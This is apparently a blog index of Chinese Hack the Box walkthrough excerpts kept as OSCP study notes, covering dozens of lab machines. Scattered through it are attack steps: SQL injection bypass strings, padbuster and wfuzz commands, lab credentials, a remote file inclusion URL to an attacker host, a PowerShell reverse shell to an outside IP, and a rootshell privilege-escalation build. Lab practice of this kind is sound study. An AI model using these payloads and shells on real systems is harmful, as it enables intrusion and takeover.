![](https://img-blog.csdnimg.cn/2020051915190587.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
Hack the box
日常在Hack the box做练习题,在练习的过程中顺便对练习过程进行记录,当作是一本学习笔记,也希望能帮到更多的人!
菜浪马废
!
展开
-
Hack the box靶机 Sneaky
扫到目录/dev用sql在密码中输入1’ or ‘1’='1得到账号和key但是没看见ssh端口开放倒是161 snmp端口在开放脚本地址登录进来了ssh -i key thrasivoulos@dead:beef:0000:0000:0250:56ff:feb9:1e9c缓冲区溢出的题但是是linux的oscp都考win的buf不做了这个...原创 2020-09-23 14:19:17 · 239 阅读 · 0 评论 -
Hack the box靶机 Lazy
提示先创建一个账号注册后登录没啥用啊抓包看看将Auth cookie 的值更改为lienzhen收到错误消息容易受到Oracle Padding Attack的攻击。Padding Oracle Attackpadbuster http://10.10.10.18/login.php XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf 8 -cookies auth=XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf -encoding 0..原创 2020-09-22 23:51:21 · 710 阅读 · 0 评论 -
Hack the box靶机 tenten
wpscan -u http://10.10.10.10 -eu,p发现用户名takis和插件job-manager找到漏洞脚本漏洞是文件包含漏洞,读取简历信息得到了一个图片steghide extract -sf HackerAccessGranted.jpg得到的id_rsa需要密码有密码了ssh登录成功...原创 2020-09-22 22:20:21 · 428 阅读 · 0 评论 -
Hack the box靶机 fuse
修改/etc/hosts在csv文件中找到的用户名cewl -d 5 -m 3 -w password.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers生成密码字典错误:Cannot connect to server. Error was NT_STATUS_PASSWORD_MUST_CHANGE需要用smbpasswd修改密码新密码:Zzz123456smb什...原创 2020-09-22 17:01:55 · 403 阅读 · 0 评论 -
Hack the box靶机 Tabby
开放80和8080查看一下点击news时发生错误看见?file=可能有文件包含先修改/etc/hosts 把10.10.10.194 megahosting.htb加入再次访问可以成功访问了接下来测试是否是文件包含漏洞访问/etc/passwd发现用户ash8080上市tomcat9访问/usr/share/tomcat9/etc/tomcat-users.xmltomcat登录账号tomcat:$3cureP4s5w0rd123!登录成功tomcat.原创 2020-09-21 18:27:07 · 383 阅读 · 0 评论 -
Hack the box靶机 Buff
Gym Management Software 1.0搜了一下漏洞发现有可用的48506原创 2020-09-21 14:52:49 · 474 阅读 · 0 评论 -
Hack the box靶机 Cache
80端口开启了扫一下目录原创 2020-09-20 23:05:13 · 297 阅读 · 3 评论 -
Hack the box靶机 Admirer
不能访问啊wfuzz一下wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -z list,txt-php-html -u http://10.10.10.187/admin-dir/FUZZ.FUZ2Z --hc 404,403 -t 100三个账号先看ftp得到两个文件压缩包里是网站源码waldo:Wh3r3_1s_w4ld0?wfuzz -c -w /usr/share/seclists/Dis...原创 2020-09-20 19:18:36 · 889 阅读 · 0 评论 -
Hack the box靶机 Blunder
-更新CMS-关闭FTP-完成-删除旧用户-完成-通知弗格斯,新博客需要图片-待定fergus应该是用户名找到登录界面bludit 3.9.2爆破脚本#!/usr/bin/env python3import reimport requests#from __future__ import print_functiondef open_ressources(file_path): return [item.replace("\n", "") for item in ope..原创 2020-09-20 15:22:07 · 413 阅读 · 0 评论 -
Hack the box靶机 Conceal
连接上了重新用nmap扫描写不动了又开始心烦了原创 2020-06-04 14:53:49 · 269 阅读 · 1 评论 -
Hack the box靶机 Bastion
还差四个靶机然后就准备去练oscp的lab了加油开了ssh还有smb先扫描smb发现Backups下面有一个note.txt下载下来查看系统管理员:请不要在本地传输整个备份文件,VPN到分公司的速度太慢。在mnt下创建Backups文件夹挂载可以直接访问smb的文件就是有点慢.VHD文件相当于硬盘挂载它访问.config文件发现账号和哈希值L4mpje:bureaulampjessh登录...原创 2020-06-04 13:12:31 · 389 阅读 · 0 评论 -
Hack the box靶机 SecNotes
注册了一个admin‘ or ‘1’='1的用户登录发现一个账户看见bash.lnk可以查看root.txt也可以像下面这样完成好几天没学习了因为有点心烦特别爱的女孩突然就走了我知道错了也知道怎么改可是根本没有机会改了特别难受只能学习了因为我怕我闲下来了就疯狂的想她我真害怕我弄丢他还是丢了其实闲不闲下来还是一直在想真他妈的烦...原创 2020-06-03 21:21:26 · 252 阅读 · 0 评论 -
Hack the box靶机 Bounty
两个页面都是没有权限不能访问但是也没有扫出来登录页面投个图他们换了本字典我懒得扫了有过滤上传了一个shell.php.gif绕过了找到一篇博客上传.config使用nishang的Invoke-PowerShellTcp.ps1的时候需要在这个文件末尾加入调用Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443然后就可以连接了没有补丁那ms15-051完成...原创 2020-06-03 18:51:20 · 451 阅读 · 0 评论 -
Hack the box靶机 Soli
突破口是oracle就是真的慢我快吐了scott/tiger不知道为什么老是连接不上给我整不会了但是我重启了一下换了一个端口然后就好了原创 2020-06-03 17:13:53 · 145 阅读 · 0 评论 -
Hack the box靶机 Arctic
找到后台登录地址coldfusion 8搜索漏洞找到可以上传的地方需要payload使用MS10-059https://github.com/Re4son/Chimichurri完成原创 2020-06-03 13:08:34 · 373 阅读 · 0 评论 -
Hack the box靶机 Bastard
修改几处地方准备用nc连接原创 2020-06-03 11:26:28 · 289 阅读 · 2 评论 -
Hack the box靶机 Chatterbox
修改地址把生成的字符串替换python里的原创 2020-06-02 14:33:24 · 209 阅读 · 0 评论 -
Hack the box靶机 Gradnma
解决进程问题进程迁移原创 2020-05-28 15:28:12 · 261 阅读 · 0 评论 -
Hack the box靶机 Grandpa
migrate进程迁移win的题怎么都是用msf做的呢看大佬们没有不用msf的原创 2020-05-28 14:41:37 · 225 阅读 · 0 评论 -
Hack the box靶机 Optimum
拿到user.txtmsf关于win的提权还是要再看看要不不会今天先这样吧睡觉原创 2020-05-28 00:28:24 · 255 阅读 · 0 评论 -
Hack the box靶机 Jerry
需要账户???????老子就点了个取消你把密码都给我了?tomcat:s3cret登录完还是这个再找找其他的/manage可以登录进来可以上传文件需要点一下我上传的shell才能连接查看有空格的文件名的时候用“”把文件名括起来就可以查看了白天不知道因为什么心烦没怎么学习随便翻了翻linux的缓冲区还有一个htb上win的简单的题还得努力啊离着月薪三万还差得远呢加油!...原创 2020-05-27 23:51:52 · 370 阅读 · 0 评论 -
Hack the box靶机 Blue
开放445端口扫描ms17010漏洞可用msf登场简单我决定先把简单的win做了然后由简入深慢慢学习31号我觉得应该能把htb的win打完加油!原创 2020-05-27 23:20:51 · 256 阅读 · 0 评论 -
Hack the box靶机 Devel
Web服务器[IIS支持.aspx .asp文件]做了两个windows的walkthrough都是教用msf提权的难道我msf一定要用到win上么?原创 2020-05-27 17:30:05 · 270 阅读 · 0 评论 -
Hack the box靶机 Legacy
MS08067我还有本MS08067实验室写的书呢就用这个漏洞吧考试的时候可以直接试一下永恒之蓝cat user.txt时需要用“”包裹住路径serach -f 文件名查找文件路径原创 2020-05-27 15:25:02 · 214 阅读 · 0 评论 -
Hack the box靶机 Frolic
admin:superduperlooperpassword_loladmin:imnothuman上面那一堆?!是Ook!语言…原创 2020-05-27 13:45:27 · 221 阅读 · 0 评论 -
Hack the box靶机 Mango
网站不能访问所以在/etc/hosts里加入10.10.10.162 mango.htb绕过教程但是登录了没啥用也枚举脚本admin的密码不能登录但是mango的可以https://gtfobins.github.io/gtfobins/jjs/jjs可以利用原创 2020-05-26 19:31:23 · 228 阅读 · 0 评论 -
Hack the box靶机 Postman
没啥能利用的啊看看6379端口脚本原创 2020-05-26 14:57:56 · 158 阅读 · 0 评论 -
Hack the box靶机 Mirai
goole一下默认密码登录失败但是可以ssh开始说在usb设备里usb设备里有文件查看发现说被删除了让我们找回重点不在于提权了考核的就是一个找回文件写着写着突然不想睡了想再来一个靶机…...原创 2020-05-26 01:20:40 · 214 阅读 · 0 评论 -
Hack the box靶机 Haircut
但是uploads没办法打开图片也没发现什么有个用户名枚举的漏洞为啥用同一个字典我只能扫出来/uploads和/index呢上传文件nc连接其实是因为他调用了curl命令咱们直接反向上传文件然后访问就能获得低权限了复制第一个代码命名为:libhax.c复制第二个代码命名为:rootshell.cgcc -fPIC -shared -ldl -o libhax.so libhax.cgcc -o rootshell rootshell.cwget在靶机下载两个文件放.原创 2020-05-26 00:09:28 · 197 阅读 · 0 评论 -
Hack the box靶机 Blocky
发现: wordpress登录页面phpmyadmin登录页面一个用户名:notchuploads页面两个文件jar反编译工具(传送门)notch:PPPBiVoTj899ItS1EZnMhqeqVbrZI4Oq0/我他*了都想骂人之前root的密码是north连ssh的而现在我们拿到的这个没个B用提权很简单直接就可以提权我给想复杂了还去看后台运行、检查文件、找内核如果oscp考试的时候是这个难度就好了try harder!...原创 2020-05-25 21:32:04 · 306 阅读 · 0 评论 -
Hack the box靶机 October
搜了一下october有漏洞然后默认的后台是/backend试了一下密码admin:admin竟然进去了????有文件上传功能shel.php抓包改成*.php5右侧click here拿到权限dirb也扫出来后台了但是我都已经不需要了接下来是缓存区溢出了正在看所以就写到这吧...原创 2020-05-25 16:21:43 · 294 阅读 · 0 评论 -
Hack the box靶机 popcorn
扫描目录发现点东西发现文件上传的地方但是没有账号但是可以注册在upload功能里上传一个照片失败不是torrent文件上传了个*.php.gif文件但是不能执行.gif绕过第一层过滤br抓包修改文件名后缀 +.php/torrent/upload查看文件点击执行nc连接以为.zip会是突破口结果不是内核提权并不能执行成功成了...原创 2020-05-24 16:58:40 · 240 阅读 · 0 评论 -
Hack the box靶机 friendzone
之前得到一个账号登录一下上传文件原创 2020-05-24 15:28:34 · 251 阅读 · 0 评论 -
Hack the box靶机 networked
原创 2020-05-23 15:01:21 · 372 阅读 · 1 评论 -
Hack the box靶机 Jarvis
有sql注入查看到是7列2345位置是有回显的说实话我今天有点累了好想用sqlmap啊DBadmin:2D2B7A5E4E637B8FBA1D17F40318F277D29964D0imissyou看到一个.py脚本执行ping命令有了user的权限什么也看不见nc一下...原创 2020-05-23 13:39:35 · 266 阅读 · 1 评论 -
Hack the box靶机 Swagshop
本来想按照顺序做friendzone的看看难度剩下的四个里他应该最难还是往后面放一放吧想想昨天的那个tartarsauce我都要崩溃了![在这里插入图片描述](https://img-blog.csdnimg.cn/202005221558129.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4MDA1ODU0,size原创 2020-05-22 23:41:01 · 425 阅读 · 1 评论 -
Hack the box靶机 Irked
nmap扫描完我就觉得突破口在irc但是没有任何信息啊再找找原创 2020-05-22 15:47:43 · 245 阅读 · 2 评论 -
Hack the box靶机 TartarSauce
5个页面访问一下找到点东西一个损坏的blog呵呵又是一个兔子洞nice一天钻了两个洞接着上面的那个损坏的页面来扫描报错没有apihttps://wpvulndb.com/apihttp://10.10.10.88/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.118:8000/需要打开http服务还要创建一个wp-load.php的反射脚本.原创 2020-05-21 23:14:00 · 518 阅读 · 0 评论 -
Hack thebox靶机 Poison
看见file=尝试文件读取/etc/passwd成功一个用户charis说加密了至少13次我就硬解码了Charix!2#4%6&8(0进去就看见一个secret.zip但是需要密码得到了secret.zip明白了这是一个兔子洞被绕进去了5801和5901是vnc的端口提权部分是ssh隧道(介绍在这)以为是兔子洞呢还好不是心态崩了...原创 2020-05-21 18:01:48 · 259 阅读 · 0 评论 -
Hack the box靶机 Sunday
心烦!!!单身的时候一个人过情人节!!!不单身了还一个人过情人节!!!继续学!我需要的是知识!我需要女朋友么?!开玩笑!两个账号原创 2020-05-21 15:33:09 · 349 阅读 · 0 评论